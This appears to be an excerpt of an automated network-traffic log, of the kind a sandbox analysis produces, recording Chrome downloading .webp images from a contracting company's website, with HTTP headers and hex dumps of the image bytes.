                                              Data Ascii: Eg#gV%Y8Q~G+JxCl%yG/uM~V8hhwmZ-0W?0"gIy'9|~,I:UGD_8Oj1DuE&bRF}'NH$>Up-`d}noFxi#;Gj\2<o&G(_>{2i2gG\
                                              2024-09-27 06:20:18 UTC8000INData Raw: a4 a3 15 7f e9 14 7f 9d 0d db 94 b3 de 75 51 f6 47 cf d0 18 b2 c4 23 f1 1b f0 3c 92 e2 1a 64 8b 47 8e ce 4d cc a7 74 ce 91 2b 49 e9 b7 e2 7c b0 ed 1d 07 f9 5d a9 ee e2 9a 10 75 e3 6d 86 dd e2 63 d2 4f 77 3f 46 2b 75 81 10 a9 9e 6a 69 ed d0 09 c3 4b 01 f6 f5 9c 80 6f b4 85 2b d9 6f c0 8e 7d 32 bd ab cd 74 f7 2a 75 d2 92 c5 94 91 8b 3d 94 ca ba d3 8f 87 17 a0 56 50 a8 14 dc 2f 20 45 7e 9d 2d 2f 33 bf dc e4 87 06 06 d3 5e cc 87 20 00 36 35 43 c0 a2 2b 63 b2 eb b0 18 49 a0 ac be c5 3d f5 3a 9a 37 9b dd dc 2c 26 f4 e9 b1 ff 4b 0f 7c 22 87 5a 97 64 f1 9e 8f 6b de 3a c4 9c 27 81 e2 6c 95 b8 fa 79 81 75 63 22 17 ba c8 ae 52 29 18 b7 28 83 96 5d d8 0c 74 a9 b7 1b 79 f4 58 78 f7 ab c7 1f e9 82 3e 1b b0 48 a9 cd a7 84 c6 d4 fe 2f e8 43 1b 6c 18 1f ae bc 53 05 4b ee
                                              Data Ascii: uQG#<dGMt+I|]umcOw?F+ujiKo+o}2t*u=VP/ E~-/3^ 65C+cI=:7,&K|"Zdk:'lyuc"R)(]tyXx>H/ClSK
                                              2024-09-27 06:20:18 UTC8000INData Raw: 6b e8 e8 1a ea d9 40 2e f9 70 f0 3c 66 ef 09 6c c9 09 55 9b aa 6f 19 88 9b b3 e3 15 5e c2 b9 29 35 1a b4 34 8f ec 3f d6 74 64 64 6f cb e1 76 2a 22 9e f5 73 10 2e 7d e6 07 34 d7 af 1f ca 86 77 75 1d 60 cc 0a 6f c0 84 94 b0 47 87 97 86 79 17 6a 7d 6a 40 f2 79 6b c3 50 f9 01 f9 50 6c ed 6d df e9 45 a3 48 7b ac 20 2c e6 64 1f d1 8f 0e 88 f6 60 ab 17 70 e5 ca 8b 23 db ef 07 f9 a4 a1 ae 6c de c0 39 29 1e bd ba 33 da aa 60 56 3c bd 1f cc 7d 77 d6 da b3 e8 55 48 d5 a4 59 dd 0c 4d d3 01 c6 85 3c eb 93 66 c8 f5 d6 d1 7d e4 ef b6 31 17 88 1b c0 05 aa e5 9d 5a bb de 89 1c e1 e7 93 bd a5 c5 ad cd 09 6d a4 d7 5a 88 bc d4 70 98 b4 5a b8 bb 67 9c ee 59 14 12 ba a3 09 dc 6b 6b 84 87 76 37 cc fa d4 ce 21 70 40 2d 39 8a a7 8f ca 45 80 90 05 9f f4 e9 f2 95 85 1b 5a 45 54 69
                                              Data Ascii: k@.p<flUo^)54?tddov*"s.}4wu`oGyj}j@ykPPlmEH{ ,d`p#l9)3`V<}wUHYM<f}1ZmZpZgYkkv7!p@-9EZETi
                                              2024-09-27 06:20:18 UTC3073INData Raw: cd 72 44 c3 24 e1 18 63 d9 e6 3b 86 4d b7 b1 0c fe f2 01 82 af 3a fd b5 4f 59 3e 6e f2 ad 70 73 f5 ce fd 3b 97 f5 88 dc d7 08 f8 b7 95 16 24 84 2c a4 d3 3b 10 e1 8b 18 a1 21 01 03 a8 c9 35 f9 6a a2 2a dd 2c 02 3b 48 e9 48 ca ad 50 14 84 c5 53 44 71 52 60 ff fc a4 32 4e f6 a3 91 80 7d ff fa 1b 7b 33 a8 cf fc f3 f6 c8 6a 80 91 cf 6c dd 2c 3a 55 b3 bb 05 59 52 80 0d 77 92 07 22 0a 07 e7 9f d8 95 05 f1 d7 24 38 10 17 2f 24 c8 e4 ac bb 67 14 2a 04 47 3f 77 75 bd 13 6c 87 9a 38 73 0a 08 c6 60 b3 90 6d 6f 72 14 a9 b8 09 2c fc df 8c 94 ca f4 b3 71 58 62 f0 1c 09 55 01 cd d1 3f 64 b0 5d 17 6a 6d 40 1f e0 f0 4f 73 8b 3f 94 36 3f b3 05 f7 41 4e 85 9f 02 93 87 51 9d 38 1f 07 6b 7a 2f 56 fd 80 13 e3 92 2a 3b fc fc af ef a6 5e b5 9e f8 38 78 66 4e 9e 32 f8 b3 0e d0 35
                                              Data Ascii: rD$c;M:OY>nps;$,;!5j*,;HHPSDqR`2N}{3jl,:UYRw"$8/$g*G?wul8s`mor,qXbU?d]jm@Os?6?ANQ8kz/V*;^8xfN25


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              110192.168.2.465447173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:18 UTC465OUTGET /uploads/projects/19/f8a20d10a257c0d0108fbe993c55b0fa.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:18 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:18 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 11:42:11 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 56552
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:18 UTC7931INData Raw: 52 49 46 46 e0 dc 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 6c dc 00 00 b0 f9 04 9d 01 2a cf 04 a3 03 3e e9 6e af 53 29 26 2e b4 23 b4 4a ca 80 1d 09 67 6e dc c0 b6 a5 e8 ff b6 e9 93 83 46 14 4c 38 f1 ca f3 c6 f1 f9 f5 3b fd cf 59 e4 bb d1 5f 9f e2 9d 9d af 7a e9 3c fd f7 9c d6 9b 11 9f 43 bf f5 aa 75 39 aa 97 8f f1 e5 6a 79 d9 bf cc f3 e9 21 6f 30 8f 3e 9e ac f9 da 7d 21 f4 48 fa cb fa 19 f4 d1 ff 8d c9 18 f9 a7 94 6f 9b 7f 5d e0 5f a4 0f b4 ff 11 ee 3d fb de 62 fe 9b fc ff 34 7f ac 7e cd ce 2f f5 7f b6 7e 48 fc 73 ff 9b fc 87 fa 2f 71 df 6a ff b8 f4 b1 fc bf db cf f7 de 49 da 97 fb ff db 5f 61 7f 66 fe ef fb 39 ec 03 f9 3e 82 ff 55 fe 9f d8 1f fc 6f a5 7f f9 3c a0 ff 3b ea 27 fd 73 fe 2f ac 37 fc 9e 78 75 20 fe
                                              Data Ascii: RIFFWEBPVP8XVP8 l*>nS)&.#JgnFL8;Y_z<Cu9jy!o0>}!Ho]_=b4~/~Hs/qjI_af9>Uo<;'s/7xu
                                              2024-09-27 06:20:18 UTC8000INData Raw: dc 18 95 2d bc 19 b5 a8 24 7d 8f 97 1a fa ff 1c c7 ff df f6 57 89 cd 97 6a de 55 c0 f3 69 b2 32 19 6c 75 92 98 bc 8c 42 fb f6 f0 c5 80 64 02 30 5d 1b ed b0 c5 b6 d4 a9 2f c0 60 7c a6 cf 6f f8 26 a5 b0 6a 7c 14 59 2c e9 5e 36 65 5b 8d 0c 46 39 54 cb d7 4a 5f 3e f3 68 c7 f3 1f dc 35 ba 94 1f 62 41 82 6b 44 c1 38 8f 7d 07 7b 7e 03 63 17 36 36 2b d5 e2 1f 2b 91 ad 38 90 40 12 a4 c3 c3 4b 30 ef 37 26 7f 9d d6 60 6d 60 12 0e ee 87 96 31 99 bf 84 9d 52 9b 3d 32 66 df aa 5f 5d 3f c7 45 fa 78 f3 a5 6b 80 f3 a9 cc be 5a 96 ac ad 13 a4 65 99 0b 28 8c 3e 15 68 34 b9 14 09 1c 63 7a e7 30 96 e6 93 a5 2c 38 23 ff d8 c2 0f 7d 38 89 df c7 26 82 99 c4 5f 32 02 b8 e0 e3 94 34 48 8b fe 3d 32 cb fb a0 dd 4f a6 ea 07 4d 39 88 21 b2 2e aa 9c 89 38 33 f0 68 71 ea 86 fc d4 62 95
                                              Data Ascii: -$}WjUi2luBd0]/`|o&j|Y,^6e[F9TJ_>h5bAkD8}{~c66++8@K07&`m`1R=2f_]?ExkZe(>h4cz0,8#}8&_24H=2OM9!.83hqb
                                              2024-09-27 06:20:18 UTC8000INData Raw: 0f f5 c2 b0 8d 3a af af dc 91 02 b3 36 25 d6 04 e8 a1 78 49 bf 37 f6 f7 19 13 6a ff dc 8a 81 12 82 89 76 10 ac 3f 26 d9 f3 c2 bc eb 40 f6 92 65 52 f6 8a 3f 61 3f dc 3b 2a 75 54 5e af bd fa a5 1b e7 25 42 9a 8f 84 b2 62 9c 66 f6 8b 93 70 92 76 b2 eb 5e 91 50 55 b3 6a ae 9f ab 26 8a 55 ed dd c6 83 44 02 88 51 5e a2 9a 82 9d 97 f9 18 a9 26 24 98 c3 0e d1 ef 5b a0 55 21 85 8e c7 4d 29 54 76 4b 47 b8 bc 56 c6 31 a9 82 62 e8 59 90 1d 0a f6 73 02 7a ac d4 33 f3 3c 11 67 91 b3 be 55 48 35 46 de 72 65 cb 4b 19 f3 d2 7d b2 23 6d 1f f9 cd 2b 11 76 d3 0f 6b db 7d 0d 1c bc 75 b2 ec ea cb 9c 36 b6 df c6 c6 27 13 90 9f 51 e5 57 31 04 1c 61 87 94 8b 99 16 79 d4 00 2c 79 5b 97 ab df 20 3d d0 f4 c6 3a b4 38 31 b0 0e b5 1b 03 9e 10 dd fa 1c c8 d0 93 9e 32 c9 ed 4f ae 05 aa
                                              Data Ascii: :6%xI7jv?&@eR?a?;*uT^%Bbfpv^PUj&UDQ^&$[U!M)TvKGV1bYsz3<gUH5FreK}#m+vk}u6'QW1ay,y[ =:812O
                                              2024-09-27 06:20:18 UTC8000INData Raw: 39 9a cb 9e 1f 52 e7 80 f6 d3 c9 6e ac ef 5e 13 59 02 ae be 00 79 30 d0 93 7b 30 50 20 48 79 b2 57 a2 57 04 82 91 aa 12 a6 13 4b 41 f0 9e c3 d3 a3 7b c6 df 9c a7 bb 00 9f cb 86 5b b3 c9 2b 31 a4 ea f8 5d b5 a1 4b 7c 83 b8 70 3e 7f d3 20 b2 57 64 f2 90 ad e5 c7 18 3d 5b 1e 32 12 60 72 2f 3c 78 d3 4a 9f 1c 0f 2b ac c6 d3 6b 23 38 64 a4 68 de f3 cd dc 8b 3d 59 87 bd af 2d 82 b4 b0 80 43 86 06 3c 62 5b c3 05 ac ba 09 60 d0 8d 73 ef fb 94 dc 7d fc 5f c6 f3 bd c4 f9 59 c4 9f ff 0e 53 ad 5c b8 10 6e d1 53 8a d8 ed 43 02 27 af 94 2c 7b 2a 83 4a 1e 88 37 7f c3 93 aa fc 33 39 0c 94 bf 94 08 79 2d 74 40 e4 6e 1e 65 60 e9 50 2c 10 b4 f5 4f 6e 19 0a 10 d3 20 9d e8 93 88 63 43 bb 2d 46 38 64 fa 0f 84 fa 8c 60 51 a9 f7 5b 39 1b 20 fd f5 3a 8c 48 bb b2 c9 b0 97 c9 c9 2a
                                              Data Ascii: 9Rn^Yy0{0P HyWWKA{[+1]K|p> Wd=[2`r/<xJ+k#8dh=Y-C<b[`s}_YS\nSC',{*J739y-t@ne`P,On cC-F8d`Q[9 :H*
                                              2024-09-27 06:20:18 UTC8000INData Raw: 20 10 c9 8b 50 b9 89 63 b9 4c 42 b7 00 bd c9 a1 fa 1e cf ba 68 68 12 a0 d9 51 31 98 1e a9 be 8b 97 c9 b6 e5 43 6e f1 86 5f ec ec 06 7b f5 84 e6 0f 55 60 b2 c0 6b bb a7 c0 34 ac 72 f0 c9 a4 55 75 5e c0 a0 e4 dd d7 31 99 ff 3e 00 8a eb eb a1 37 3b 7f 1d 20 04 f1 68 54 1c 1f a9 3e 6b fa c6 19 e9 c3 45 36 8b f5 f7 f7 c2 ce 8c 5a 88 94 34 8b 57 1c 3b c7 ce 89 2a 40 7b 84 cf dc f0 90 5a ba 99 54 78 c9 71 cf 46 b8 3e 9f b7 41 17 96 d1 6d e9 88 63 13 81 24 6a 50 54 e8 66 a3 f2 87 18 6e ba 47 80 91 a1 3f 85 67 57 55 85 bf 7b 5e 3f aa 2a c6 58 98 d3 18 51 aa f2 47 0a 89 36 bd 23 b5 a3 cd e1 a8 03 39 7d c3 47 19 33 33 b5 fd 0d 7d f6 df 3e 0b 3b 0a 56 e2 fc a9 02 92 d3 d6 5a dd d7 37 fd 23 41 a4 53 a2 d6 dd 24 cd de cb 58 b6 e0 9e c5 4a 56 da 99 be 43 02 c5 e9 d3 7b
                                              Data Ascii: PcLBhhQ1Cn_{U`k4rUu^1>7; hT>kE6Z4W;*@{ZTxqF>Amc$jPTfnG?gWU{^?*XQG6#9}G33}>;VZ7#AS$XJVC{
                                              2024-09-27 06:20:18 UTC8000INData Raw: 57 9c 08 ce 5e 1c 4c 93 92 32 36 a6 46 b8 ee fc bf 03 d9 f8 2f 9f 7f be df 39 5e cc 95 64 c2 5c a5 b0 6f 87 09 c2 ef a6 1a f8 09 0b 58 34 c9 d9 2c 4a c2 fa af ee fa a7 af 72 cd 04 f8 30 3a 3f 1b 5c 80 ed 94 ba ef b5 ec 04 37 8f 24 90 c0 43 32 8a 3a 7f 6c 73 b1 64 f3 58 8f ad f1 3f 9f a3 4d e7 3e 40 55 c6 fb ee b0 c9 88 4d 74 76 b6 fc 96 0f 61 2a bf ac 82 18 ea 66 2a 4f 97 5f cb dc 18 49 48 bb 5d 4b e5 73 09 50 bf b7 9b d9 2c 69 bd 44 a0 5d 3f a5 dc 6c a5 d7 5c 2d be 17 1a 57 03 3f 2c b8 2f be fd d9 59 ec 60 f7 66 5a 41 c7 94 fe dc 59 d6 c1 d4 06 3c a3 3e 7e 66 48 48 b8 2d 27 8e cf 39 e6 98 b9 b0 fc 4a bb df 50 06 c5 26 09 ed b9 21 b0 e3 31 13 9d 1c 01 84 d6 bd a9 e0 3f 32 34 97 a9 e2 f6 e4 c0 14 ad 02 78 38 c4 d9 82 53 99 b7 07 b1 27 1d d9 88 25 ce 85 58
                                              Data Ascii: W^L26F/9^d\oX4,Jr0:?\7$C2:lsdX?M>@UMtva*f*O_IH]KsP,iD]?l\-W?,/Y`fZAY<>~fHH-'9JP&!1?24x8S'%X
                                              2024-09-27 06:20:18 UTC8000INData Raw: 02 b3 c5 9d 2c 42 c0 90 92 c8 96 81 d5 3e 2a 3f 27 33 c1 82 3d 39 5b 5f f6 9d f3 18 42 b8 54 4e 82 34 8b 8f 76 25 24 a6 37 c9 94 8c e9 3b 18 da 89 3d ca 9f 7d d2 8a 5c 60 f3 27 a5 a8 49 ad 71 0c 8f 97 44 9f e4 80 f3 ee 6a 02 a0 85 41 99 b8 5d 97 38 c0 a1 5b 38 98 3a b8 5f ad 3c a3 3d 92 2c 81 9d 33 30 21 d2 a2 d8 78 9f cd 1c 26 4a ff 4a 9d e5 91 f8 c1 88 9a 23 2b 7a 83 4f ee f6 c5 e0 a6 f7 85 0d e9 95 8e 55 34 62 89 f9 5a 61 8f 2d 85 ef 7e 97 04 1f 81 ec 97 89 d9 37 8f 0c 5b ad 3d 30 fd 89 8c f8 5f 48 8a 36 25 16 6d 91 41 02 c1 62 5e 07 35 c6 67 0f f6 60 f1 a1 4e 75 cc c6 c5 57 f1 fd c8 4e ad f4 f1 ec 03 8d c6 66 5d 66 5b 44 a1 c5 82 2b 9e 78 f5 ad 0b d5 c3 ff 4b 3b 63 d9 4a 71 8e 96 1c 54 a8 3b d8 77 83 cc 30 09 d6 1b 0a 05 13 0e d4 7a 93 b3 d4 3e 69 40
                                              Data Ascii: ,B>*?'3=9[_BTN4v%$7;=}\`'IqDjA]8[8:_<=,30!x&JJ#+zOU4bZa-~7[=0_H6%mAb^5g`NuWNf]f[D+xK;cJqT;w0z>i@
                                              2024-09-27 06:20:18 UTC621INData Raw: 37 33 fc ac 34 e3 05 a1 f2 9d 8d 91 28 a2 d0 e3 b8 ba 19 69 38 56 b8 cb 18 62 a1 0d 15 24 10 98 e1 ee af 80 f0 5c 38 bd ce 0c 74 f5 13 85 20 c1 b4 7b 74 df 6f 9b 6c 3d 88 ca d3 66 f9 9f db 07 e4 1c 07 67 55 68 95 ba 69 f4 4c b0 5f 19 d6 58 97 b4 4b 41 3d 92 f5 cc 77 f6 69 bf 4c 14 b0 93 ef c6 e0 1f 80 c9 8d 35 69 32 5d 62 9f 01 9c 33 c0 62 d9 d8 b3 aa 2e b7 4e 55 4c 54 cb b4 49 05 1f 4d 18 83 c1 a8 3c 2f ac f4 8d f1 f6 b9 56 fe 80 8d 88 4c 32 93 9e 07 29 1c b1 18 b8 7e 85 12 e1 a1 df 78 73 1a a1 fe c6 30 6e 42 24 a6 ab 68 89 4d 9a 20 13 bd b4 ef 72 78 9a b1 86 56 5f 70 43 18 30 22 9a e7 a2 0b 01 c4 da bc 8e 95 20 5d cb 18 28 a2 12 e1 32 75 70 17 c3 70 fe 7c ca 80 e5 c2 43 bc 8c b7 03 7b 6c 61 5b 60 87 06 4e 79 ce 4a f4 88 3a 3b 6a d7 a4 0b e7 c3 74 40 d5
                                              Data Ascii: 734(i8Vb$\8t {tol=fgUhiL_XKA=wiL5i2]b3b.NULTIM</VL2)~xs0nB$hM rxV_pC0" ](2upp|C{la[`NyJ:;jt@


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              111192.168.2.465449173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:18 UTC465OUTGET /uploads/projects/12/99cc5d257a0d7f25b4541a6275919c83.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:18 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:18 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 09:39:06 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 81372
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:18 UTC7931INData Raw: 52 49 46 46 d4 3d 01 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 60 3d 01 00 70 cb 06 9d 01 2a cf 04 a3 03 3e e9 6c ad 50 a9 26 32 b8 a8 d2 eb 33 10 1d 09 49 67 2e 4e 8b 67 e1 f5 59 fe 4d f9 ff 07 0a 77 4a 2e 77 de 41 a4 d2 dc c6 2c 64 cc 91 83 5f 73 e2 05 da 3e 99 1c 84 d0 24 7b de 6c 2d b0 93 8a f3 ec 07 d0 a9 73 e7 1e 37 ba a4 64 43 e5 59 cb fc 47 7d 9f fd 5e b9 ff c2 7a 5c fa 15 ff e5 ec 63 fa f7 a2 ef eb 7f f3 fd 6a 3d 4a 7f aa f5 0e ff 1d e9 ab eb 45 fd 63 d5 63 ce b7 d6 f7 fc bf ac 06 61 4f fe 6f 37 5f 43 ff 07 c0 bf d0 fd ed 3f 9f f7 2a c1 bf d6 f8 3d fd e7 f9 0e 74 bf d4 f0 d7 f6 3f ea fd 0b ff 5b fe e1 e7 63 fd 9e 13 1a df 87 06 68 ff b7 ea 27 f3 7f ef 76 65 3f 09 e8 b5 e9 1b ff b7 a6 5f d9 ff f1 fa 5b 17 bf
                                              Data Ascii: RIFF=WEBPVP8XVP8 `=p*>lP&23Ig.NgYMwJ.wA,d_s>${l-s7dCYG}^z\cj=JEccaOo7_C?*=t?[ch've?_[
                                              2024-09-27 06:20:18 UTC8000INData Raw: 20 95 3e 15 1f 50 96 a2 1d 12 bf 6b 79 20 de 4c 0f 17 0a 66 c8 37 62 fa 96 c4 71 78 37 0b f7 b3 b5 c0 06 9e 42 bb 89 33 a7 9c 92 85 0c 24 bd 61 39 b0 cf 24 35 53 36 58 de 67 ae ef 68 0e 70 f3 f1 99 5a 64 69 4f ac 87 32 fb 04 41 2d 32 55 e1 c1 31 5c 4c 51 6d b7 5c 38 b0 f0 78 03 64 14 17 11 ac 90 79 08 f2 0a 10 52 22 1d 39 8f 26 84 44 59 1a 76 23 1a 0b 1d a6 8f db 17 7a 5f a8 f2 8b e9 3c 73 64 6a fe fe 69 a6 50 89 75 13 56 b4 e6 18 de e9 96 85 6b f2 fa 39 5c d3 fb 03 fa 19 3e 0c 41 3b f4 25 02 5b d7 59 33 7e 18 2d 59 17 c7 d4 83 7b 72 e2 f3 44 ae 58 ee 7c ce 54 53 1d 6c 38 6b c5 3a 6c 08 68 16 c4 0e 01 9e c0 e1 69 32 6a 3f 03 64 5d d5 d3 39 c1 7c 80 80 96 7c fd 15 6e 36 6f e5 12 2e 4d 53 d6 d5 a8 89 09 a2 95 c0 50 a5 68 53 c1 3b 2c 37 96 ad bf 27 12 19 1d
                                              Data Ascii: >Pky Lf7bqx7B3$a9$5S6XghpZdiO2A-2U1\LQm\8xdyR"9&DYv#z_<sdjiPuVk9\>A;%[Y3~-Y{rDX|TSl8k:lhi2j?d]9||n6o.MSPhS;,7'
                                              2024-09-27 06:20:18 UTC8000INData Raw: 70 b3 8c 3b c5 5b db 83 10 7c 5a dc 5f b2 fe 89 bd cb 69 e0 8f e4 f4 89 24 fd 65 e6 f0 4f 2f aa d1 b2 56 e1 65 be 4d c9 5e 77 1d c8 28 b3 29 62 ff 40 27 f4 81 7b 6d 65 ce 1e 65 45 ad 49 d1 14 f4 00 00 21 10 01 6c 00 06 c9 14 94 c7 b0 5a 78 58 1c df b0 09 ad ac eb 81 5c 13 5f c3 1c 5b de f2 47 d3 33 29 d1 b7 f8 3b 73 1b 2e 36 7e 89 92 3d 3f 03 63 b6 a7 e0 38 d9 de c0 19 a5 fd df e7 2b 04 3a 4f 9e 10 7e 17 20 6c 85 63 40 81 09 cb f2 36 fe 16 91 d9 a6 be 18 4a 61 07 74 58 0e f8 07 1d 97 05 bc 5a 3e 94 60 a8 67 63 65 4a 7d ec a4 b9 04 51 94 76 b6 4f f9 28 49 4b 5c de 13 9b d7 04 fb b3 cf 41 a3 56 cb c8 d3 1f eb a9 80 24 f7 d1 f0 25 d8 fd 94 f3 7c c4 d5 46 01 67 2b 63 b5 96 e4 60 92 72 0c 41 a2 b2 aa d7 02 c5 ef 92 cb 53 3b ce 00 09 3f 11 e6 43 e1 4a bb 50 6d
                                              Data Ascii: p;[|Z_i$eO/VeM^w()b@'{meeEI!lZxX\_[G3);s.6~=?c8+:O~ lc@6JatXZ>`gceJ}QvO(IK\AV$%|Fg+c`rAS;?CJPm
                                              2024-09-27 06:20:18 UTC8000INData Raw: da 89 46 c4 31 c2 ac c2 8e 6c 38 ae ea 1e 76 86 5e bc f3 fa a1 1a 70 c3 fb b6 8a 24 6c 2a 29 d8 92 f6 8d f4 a4 fe 78 be 21 2f 00 62 6c b1 71 df c9 48 09 c5 6b be 10 b8 04 52 3c aa 69 c9 6e c3 83 bf 82 6b e1 c0 bf 90 18 b4 c6 de b8 41 84 26 1b 68 0f 92 e8 b4 4b 8e b8 08 57 05 ba b5 56 e6 7f e7 48 f1 90 02 a6 0c 9f 92 5b ae 28 d5 c9 f5 33 e8 32 52 4b 2f f6 2f 7a e4 39 b9 85 62 e6 73 33 23 93 96 17 e5 b6 5b 98 6e cc 9c 00 1e 9c 84 39 26 7f f5 62 c2 8a a4 e7 38 da 57 ee b3 99 0d 62 12 fd d1 cb 32 b9 79 fd b3 97 d2 82 11 21 41 4a 45 50 c2 62 4f 60 c5 c6 2f ea 26 6f f1 d3 da ba 76 77 68 c3 2a a6 44 ef 88 66 4a a4 b9 96 5e 20 df 77 e4 57 93 23 76 c5 82 14 f1 07 1a 6b e5 f6 4b 70 e3 ab 8d 44 fe e7 8a 64 d9 c8 ea ce 35 ab 53 04 d8 f4 a1 8f ad 7b 0c a4 3e b1 4e 15
                                              Data Ascii: F1l8v^p$l*)x!/blqHkR<inkA&hKWVH[(32RK//z9bs3#[n9&b8Wb2y!AJEPbO`/&ovwh*DfJ^ wW#vkKpDd5S{>N
                                              2024-09-27 06:20:18 UTC8000INData Raw: b2 71 65 87 86 5a 8a f3 52 e4 9e 6c dc 99 fd 2f 01 86 cb 16 87 07 cf 27 a8 ca 92 98 01 7e 37 c9 ad dc 12 90 8d 1b 91 d7 97 ec 25 0b e5 b5 1d 76 7f 00 ee 45 34 5b 49 4a 8e 22 15 8c 68 b1 4a 36 6e fd a9 8b b8 82 99 9b df 6a e2 ce 21 96 a5 0e 79 d4 00 aa 05 db 16 df be e9 9a c4 b1 00 42 00 1f e4 9d 2c 93 09 9c ef 9d 74 c3 ca f2 65 ec f1 84 c2 26 d4 14 9a 79 70 c7 69 a4 e2 de ea 5e a7 8b b1 6d 7d 15 26 da 4a 15 66 05 4e f0 ff 45 3c b8 c0 7a ad d7 e0 2b e9 f9 3b 05 2f 6b 97 58 41 e9 be 31 3f 6c a1 af 5a 4d 02 30 a7 3b b3 10 e3 c2 ab 22 bd dd 21 0e f8 02 cb 3a 3d ef 95 fb ed 0f 17 be 92 bc 5e c0 bd d4 fc 55 86 62 cf 59 a4 dd 26 eb 9c 48 c8 a7 89 cc 2f cd 5f cf b1 4d 99 e5 21 97 ee 80 59 0a a6 79 1c 17 a1 ba 4c 7b e3 68 15 0b 62 f6 26 0f 21 b2 8d 1c 30 2b 93 7b
                                              Data Ascii: qeZRl/'~7%vE4[IJ"hJ6nj!yB,te&ypi^m}&JfNE<z+;/kXA1?lZM0;"!:=^UbY&H/_M!YyL{hb&!0+{
                                              2024-09-27 06:20:18 UTC8000INData Raw: 22 1e b1 02 41 23 6c f6 36 93 81 01 46 a1 63 1d d1 4a 58 b8 ae 7f cc ba 34 5a c7 80 6d 2e 50 3b 1a 51 3c 00 b5 c6 61 c4 a1 ce c6 27 79 79 49 ad cc 7e a5 16 bc 8f bd 00 b2 c5 e5 3e da 26 8a 53 78 3a 94 bd ba 2f a8 6b e3 47 97 3c d0 51 10 6f 0a f2 78 59 ca 60 c2 6d 5e 13 17 bc 9e e6 bc a9 b9 9b d4 e5 29 f0 4a 94 f9 e9 c9 58 5e 17 f4 b0 40 2e 81 20 92 3c fa 66 43 65 65 e9 c1 63 95 3c 7e 20 72 9f 14 ec f6 e6 3b c8 bd 5a 10 61 ee bb 86 bc 74 f9 80 8d 58 26 77 ce df 6d a7 30 7d 65 59 48 ba f1 dd 1a 7c 14 ea f5 93 6b e5 1c bc 4c 5e f5 81 a3 a0 8b 2a fe 91 12 5a ce 81 2b cd 3c fd 45 bd d2 b0 e3 d9 15 06 f6 02 54 5f dd 2a 4d 71 a1 04 c2 84 21 82 60 a4 a5 ee 4f ea 8b 96 12 6a 2a fd 9c 00 e6 34 f8 64 80 90 63 72 09 e6 73 f3 5d a5 ff 41 78 fc 25 a4 2f d3 00 90 a1 cc
                                              Data Ascii: "A#l6FcJX4Zm.P;Q<a'yyI~>&Sx:/kG<QoxY`m^)JX^@. <fCeec<~ r;ZatX&wm0}eYH|kL^*Z+<ET_*Mq!`Oj*4dcrs]Ax%/
                                              2024-09-27 06:20:18 UTC8000INData Raw: 22 83 27 72 c3 b5 95 19 4c 59 7f ba 1e e7 e6 8f 2f 66 2f e1 15 6b 16 c7 76 b4 92 cf 17 c5 d7 7a a6 9a 70 58 1c 79 bb 56 d3 0b 31 be ae e7 8a df e8 ff 30 0f 58 56 30 4d 87 d0 cc bf 8c 16 5a 23 c7 c5 db 96 3d c1 30 76 5f 93 a6 4b 76 36 4f eb f5 d4 f3 29 fa e7 56 c9 9f a9 18 eb 65 76 b3 85 cc 9a 65 e2 5b 5a 27 73 1f ab ec 58 22 9a 09 48 b5 13 3b d5 f6 29 03 be 70 1f 98 d2 65 83 4c 10 4d 5b 1d 0d fc 53 db 24 71 91 fb 7f b9 b6 51 63 6f 52 ce de cc ea d0 ea 3b 23 cd eb e8 4c 25 25 86 5f ab fd 47 7f 77 d4 a7 85 d9 af e0 03 be de ea f1 ff d7 cb 35 23 a5 df 71 6b 83 d1 6f 40 2a 2e 6f b1 ce 0a 00 b2 04 1a 5d 83 10 5c f1 2b dd 31 36 74 56 ab 25 a1 b3 fe f8 e8 fc eb 61 57 8c 93 bf cc 39 8f 50 42 61 99 e0 02 7b f0 87 0a 16 22 c6 b9 81 55 67 66 47 1a d4 43 b5 b7 82 f9
                                              Data Ascii: "'rLY/f/kvzpXyV10XV0MZ#=0v_Kv6O)Veve[Z'sX"H;)peLM[S$qQcoR;#L%%_Gw5#qko@*.o]\+16tV%aW9PBa{"UgfGC
